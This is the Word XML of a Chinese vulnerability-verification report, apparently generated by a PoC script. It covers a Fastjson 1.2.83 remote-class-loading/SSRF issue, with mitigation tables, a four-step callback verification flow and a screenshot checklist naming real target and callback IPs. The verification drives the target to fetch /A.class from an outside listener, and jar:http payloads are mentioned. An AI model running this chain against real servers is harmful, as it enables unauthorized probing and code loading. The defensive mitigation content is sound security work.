      <w:tr w:rsidR="00834902" w14:paraId="438F42E9" w14:textId="77777777" w:rsidTr="008349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D079C96" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ClassLoader</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>审计</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="080F0714" w14:textId="77777777" w:rsidR="0083490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 xml:space="preserve">审计自定义 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ClassLoader</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>，拒绝 http/https/jar/file 协议资源名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A06CAC5" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219DD783" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>长期措施</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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834902" w14:paraId="5303AE72" w14:textId="77777777" w:rsidTr="008349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F617E4D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A373547" w14:textId="77777777" w:rsidR="0083490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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="5150D8F7" w14:textId="77777777" w:rsidTr="008349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F483A75" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>优先使用 JDK 17+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20F77BB0" w14:textId="77777777" w:rsidR="0083490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阻断 defineClass 路径（但不能单独消除 SSRF）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="1ABC24B5" w14:textId="77777777" w:rsidTr="0083490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5A06741" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>容器沙箱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15A5F531" w14:textId="77777777" w:rsidR="0083490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限制 /proc/self/fd 暴露，使用最小网络策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="6B241316" w14:textId="77777777" w:rsidTr="008349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ED8E74E" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>监控告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="222E73FA" w14:textId="77777777" w:rsidR="0083490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监控 JVM 临时目录 jar_cache* 活动和异常 HTTP 请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61FD27F4" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47F2AA4F" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>注意：仅固定 JSON.parseObject 的第二参数（目标类型）不能防御本漏洞，仅关闭 AutoType 也不能防御，必须启用 SafeMode 或迁移 Fastjson 2.x。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E3B70E" w14:textId="03159B7A" w:rsidR="00834902" w:rsidRDefault="00000000" w:rsidP="00762017">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>八、验证流程总结</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FF2575F" w14:textId="480453EE" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>┌─────────────────┐        ┌──────────────────┐        ┌─────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>│  测试终端        │        │  目标服务器        │        │  回调服务器      │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">│  Windows        │        │  </w:t>
      </w:r>
      <w:r w:rsidR="00762017">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     │        │  1.12.37.40     │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>│                 │  POST  │  :</w:t>
      </w:r>
      <w:r w:rsidR="00762017">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            │  HTTP  │  :6111          │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>│  poc.py ────────┼──────→ │  Fastjson 1.2.83  │──────→ │  监听器         │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>│                 │  JSON  │  ↓                │  GET   │  ↓              │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>│                 │        │  getResource      │        │  记录回调       │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>│                 │        │  AsStream         │        │  = 漏洞存在 ✅   │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>└─────────────────┘        └──────────────────┘        └─────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0EB5B3" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>验证四步法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D53DF" w14:textId="77777777" w:rsidR="00834902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1. 回调服务器启动监听（python3 一行命令，无需安装依赖）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21673C33" w14:textId="77777777" w:rsidR="00834902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2. 计算回调 IP 整数形式（避免 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 点号替换拆散 URL）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107D2E1F" w14:textId="77777777" w:rsidR="00834902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3. 测试终端运行 PoC 发送 5 种 Payload 变体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F1A94" w14:textId="77777777" w:rsidR="00834902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4. 观察回调终端是否收到 HTTP GET 请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348B65E6" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D102FE" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>✅ 有回调 → 漏洞确认存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076CAD55" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t xml:space="preserve">❌ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>无回调</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>未触发（SafeMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>AppClassLoader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>防火墙</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>非目标版本</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F424E4C" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC2B132" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>九、验证截图 Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1114A11C" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>☐ 目标首页验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F756FC2" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     curl http://47.98.105.92:8080/ 返回 "Fastjson 1.2.83 Lab | JDK 21.0.11"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D5558" w14:textId="77777777" w:rsidR="00834902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☐ 回调监听就绪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCFF214" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">     1.12.37.40:6111 显示 "等待目标发起请求"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4086AC54" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">☐ PoC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>发送成功</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="098DDBCD" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     5 个 Payload 均返回 HTTP 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2235ED50" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>☐ 回调确认</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DDE57D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     终端出现 "!!! 收到回调: 47.98.105.92 → /A.class"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9B491" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>☐ UA 确认</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F50F572" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     User-Agent 显示 "Java/21.0.11"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4D6EE" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>☐ 多接口确认</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79162AFE" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     /parse、/parseObject、/user/create 均收到回调</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627C5DDD" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>☐ Spring Boot Loader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5829D069" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     jar:http:// payload 也收到回调，确认 LaunchedURLClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572D1FEA" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792E30B1" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0EEA96" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>— 报告结束 —</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634A7919" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>生成日期：2026-07-21 10:27:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B14909E" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>本文档由 PoC 脚本自动生成</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0083490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9EB1EF" w14:textId="77777777" w:rsidR="00BF3108" w:rsidRDefault="00BF3108" w:rsidP="00E3686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DDFA933" w14:textId="77777777" w:rsidR="00BF3108" w:rsidRDefault="00BF3108" w:rsidP="00E3686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4396B3" w14:textId="77777777" w:rsidR="00BF3108" w:rsidRDefault="00BF3108" w:rsidP="00E3686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E64E10F" w14:textId="77777777" w:rsidR="00BF3108" w:rsidRDefault="00BF3108" w:rsidP="00E3686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5025041">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1609387925">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1576861863">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="799031294">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1755082875">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1033771504">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1269509271">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2055351146">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1713967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79DF"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="006612EF"/>
    <w:rsid w:val="00762017"/>
    <w:rsid w:val="00834902"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00BF3108"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00E3686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50296DA"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{61EBBC9C-B658-46AE-808E-7AA9543DC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13</Pages>
  <Words>1966</Words>
  <Characters>5527</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>460</Lines>
  <Paragraphs>312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小影 承</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-21T03:10:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>